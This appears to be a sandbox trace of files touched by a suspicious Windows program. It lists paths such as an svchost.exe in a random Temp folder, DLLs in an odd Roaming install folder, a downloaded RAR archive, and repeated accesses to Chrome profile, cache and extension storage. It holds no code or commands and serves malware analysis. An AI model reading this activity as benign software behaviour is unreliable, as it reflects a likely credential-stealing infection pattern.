C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\libassuan-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\zlib1.dll

C:\Config.Msi\e57acfc.rbs

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Temp\aPee1yKEMUOBcG5\svchost.exe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnppepmebaijhkghebgnogijhbmopafg\CURRENT

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe588d47.TMP

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000015

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000016

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00003e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00006d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00004c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\406d7f972a375165_0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\8dd2a49426d24942_0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\1558c9e953f4a24f_0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\8fd654a217dc1612_0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\4411f9c41dbf3f28_0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000018

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00004e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00009b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000b2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000bb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Default\_metadata\generated_indexed_rulesets\_ruleset1

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\Downloads\irizari8.rar

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnppepmebaijhkghebgnogijhbmopafg\MANIFEST-000001

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
